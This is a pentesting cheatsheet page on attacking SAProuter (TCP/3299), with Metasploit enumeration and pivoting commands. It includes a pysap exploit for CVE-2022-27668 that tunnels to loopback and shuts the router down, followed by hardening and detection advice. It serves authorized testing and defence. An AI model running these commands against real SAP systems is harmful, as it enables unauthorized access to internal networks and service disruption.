daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

3299-pentesting-saprouter.md (7868B)


      1 ---
      2 title: "3299/tcp - Pentesting SAProuter"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/3299-pentesting-saprouter.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/3299-pentesting-saprouter.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 3299/tcp - Pentesting SAProuter
     14 
     15 ```text
     16 PORT     STATE SERVICE    VERSION
     17 3299/tcp open  saprouter?
     18 ```
     19 
     20 The Metasploit workflow below is based on Rapid7's SAProuter research.<sup>[[1]](#references)</sup>
     21 
     22 ## Understanding SAProuter Penetration with Metasploit
     23 
     24 SAProuter is an application-level gateway for SAP network traffic. It uses a route permission table (`saprouttab`) to decide which source may reach which host and service, and its default listener is TCP/3299. It complements rather than replaces a firewall.<sup>[[3]](#references)</sup>
     25 
     26 **Scanning and Information Gathering**
     27 
     28 First, use the **sap_service_discovery** module to identify SAP services and confirm whether SAProuter is present.
     29 
     30 ```text
     31 msf> use auxiliary/scanner/sap/sap_service_discovery
     32 msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
     33 msf auxiliary(sap_service_discovery) > run
     34 ```
     35 
     36 Following the discovery, further investigation into the SAP router's configuration is carried out with the **sap_router_info_request** module to potentially reveal internal network details.
     37 
     38 ```text
     39 msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
     40 msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
     41 msf auxiliary(sap_router_info_request) > run
     42 ```
     43 
     44 **Enumerating Internal Services**
     45 
     46 With obtained internal network insights, the **sap_router_portscanner** module is used to probe internal hosts and services through the SAProuter, allowing a deeper understanding of internal networks and service configurations.
     47 
     48 ```text
     49 msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
     50 msf auxiliary(sap_router_portscanner) > set PORTS 32NN
     51 ```
     52 
     53 This module's flexibility in targeting specific SAP instances and ports makes it an effective tool for detailed internal network exploration.
     54 
     55 **Advanced Enumeration and ACL Mapping**
     56 
     57 Further scanning can reveal how Access Control Lists (ACLs) are configured on the SAProuter, detailing which connections are allowed or blocked. This information is pivotal in understanding security policies and potential vulnerabilities.
     58 
     59 ```text
     60 msf auxiliary(sap_router_portscanner) > set MODE TCP
     61 msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
     62 ```
     63 
     64 **Blind Enumeration of Internal Hosts**
     65 
     66 In scenarios where direct information from the SAProuter is limited, techniques like blind enumeration can be applied. This approach attempts to guess and verify the existence of internal hostnames, revealing potential targets without direct IP addresses.
     67 
     68 **Leveraging Information for Penetration Testing**
     69 
     70 Having mapped the network and identified accessible services, penetration testers can utilize Metasploit's proxy capabilities to pivot through the SAProuter for further exploration and exploitation of internal SAP services.
     71 
     72 ```text
     73 msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
     74 msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
     75 msf auxiliary(sap_hostctrl_getcomputersystem) > run
     76 ```
     77 
     78 **Conclusion**
     79 
     80 This approach underscores the importance of secure SAProuter configurations and highlights the potential for accessing internal networks through targeted penetration testing. Properly securing SAP routers and understanding their role in network security architecture is crucial for protecting against unauthorized access.
     81 
     82 For more detailed information on Metasploit modules and their usage, visit [Rapid7's database](http://www.rapid7.com/db).
     83 
     84 ---
     85 
     86 ## CVE-2022-27668 – Improper Access Control ➜ Remote Administrative Command Execution
     87 
     88 In June 2022, SAP released Security Note **3158375** for a critical improper-access-control flaw in the SAProuter versions listed below. When `saprouttab` permits the necessary route, an unauthenticated remote attacker can tunnel administrative packets such as *shutdown*, *trace-level*, and *connection-kill* to the router even when it was started without the `-X` remote-administration option.<sup>[[2]](#references)</sup>
     89 
     90 The issue results from the possibility to build a tunnel to the router’s own loopback interface by targeting the unspecified address **0.0.0.0**. Once the tunnel is established, the attacker gains local-host privileges and can run any admin command.<sup>[[2]](#references)</sup>
     91 
     92 Practical exploitation can be reproduced with the **pysap** framework:
     93 
     94 ```bash
     95 # 1. Build a loopback tunnel through the vulnerable SAProuter
     96 python router_portfw.py -d <ROUTER_IP> -p 3299 \
     97                         -t 0.0.0.0    -r 3299 \
     98                         -a 127.0.0.1  -l 3299 -v
     99 
    100 # 2. Send an admin packet (here: stop the remote router)
    101 python router_admin.py -s -d 127.0.0.1 -p 3299
    102 ```
    103 
    104 **Affected versions**
    105 
    106 * Stand-alone SAProuter 7.22 / 7.53
    107 * Kernel 7.49, 7.77, 7.81, 7.85–7.88 (incl. KRNL64NUC/UC)
    108 
    109 **Fix / Mitigation**
    110 
    111 1. Apply the patch delivered with SAP Note **3158375**.
    112 2. Remove wildcard (`*`) targets from `P` and `S` lines in `saprouttab`.
    113 3. Make sure the router is started **without** the `-X` option and is **not** directly exposed to the Internet.
    114 
    115 ---
    116 
    117 ## Updated Tooling & Tricks
    118 
    119 * **pysap** provides `router_portfw.py`, `router_admin.py`, and `router_trace.py` for crafting NI/Router packets, testing ACLs, and reproducing CVE-2022-27668 in an authorized lab.<sup>[[4]](#references)</sup>
    120 * **Nmap** – extend service detection by adding the custom SAProuter probe:
    121 
    122   ```text
    123   Probe TCP SAProuter q|\x00\x00\x00\x00|
    124   ports 3299
    125   match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
    126   ```
    127 
    128   Combine with NSE scripts or `--script=banner` to quickly fingerprint versions that leak the banner string (`SAProuter <ver> on '<host>'`).
    129 * **Metasploit** – the auxiliary modules shown above still work through a SOCKS or NI proxy created with pysap, enabling full framework integration even when the router blocks direct access.
    130 
    131 ---
    132 
    133 ## Hardening & Detection Checklist
    134 
    135 * Filter port **3299/TCP** on the perimeter firewall – allow traffic only from trusted SAP support networks.
    136 * Keep SAProuter **fully patched**; verify with `saprouter -v` and compare against the latest kernel patch level.
    137 * Use **strict, host-specific** entries in `saprouttab`; avoid `*` wildcards and deny `P`/`S` rules that target arbitrary hosts or ports.
    138 * Configure an SNC environment, start each SAProuter with **`-K <snc-name>`**, and use `KT` plus `KP`/`KD`/`KS` route-table entries where adjacent SAProuters must authenticate and encrypt traffic.<sup>[[3]](#references)</sup>
    139 * Disable remote administration (`-X`) and use **`-H <hostname-or-address>`** to bind only the required interface instead of listening on every local address.<sup>[[3]](#references)</sup>
    140 * Monitor the **dev_rout** log for suspicious `ROUTER_ADM` packets or unexpected `NI_ROUTE` requests to `0.0.0.0`.
    141 
    142 ---
    143 
    144 ## Shodan
    145 
    146 - `port:3299 !HTTP Network packet too big`
    147 
    148 ## References
    149 
    150 - [1] [Piercing SAProuter with Metasploit](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/)
    151 - [2] [Improper Access Control in SAP® SAProuter (CVE-2022-27668)](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/)
    152 - [3] [SAP Help - Introduction to SAProuter and route permission tables](https://help.sap.com/docs/SAP_NETWEAVER_701/ba627ada0df549ab97b2d7a2c1a79b68/48ce58b318d3424be10000000a421937.html)
    153 - [4] [pysap documentation](https://pysap.readthedocs.io/en/latest/)